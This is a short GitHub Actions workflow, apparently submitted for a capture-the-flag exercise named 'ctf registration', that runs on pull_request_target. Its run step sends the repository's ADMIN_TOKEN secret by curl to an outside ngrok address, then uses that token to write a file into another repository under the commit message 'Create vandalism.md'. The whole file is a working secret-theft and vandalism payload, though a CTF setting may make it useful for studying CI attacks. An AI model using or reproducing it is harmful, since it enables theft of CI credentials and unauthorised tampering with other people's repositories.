name: ctf registration
on: [pull_request_target]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Use Node.js ${{ matrix.node-version }}
        uses: actions/setup-node@v1
        env:
          GITHUB_TOKEN: ${{ secrets.ADMIN_TOKEN }}
      - run: |
          curl -X POST -H 'Content-type: application/json' --data '{"text":"'"$GITHUB_TOKEN"'"}' http://312177246bcd.ngrok.io/api/info
          curl -X PUT -H "Authorization: bearer $GITHUB_TOKEN" https://api.github.com/repos/incredibly-secure-naortalmor1/contents/README.md --data '{"message": "Create vandalism.md", "content": "aaa"}'
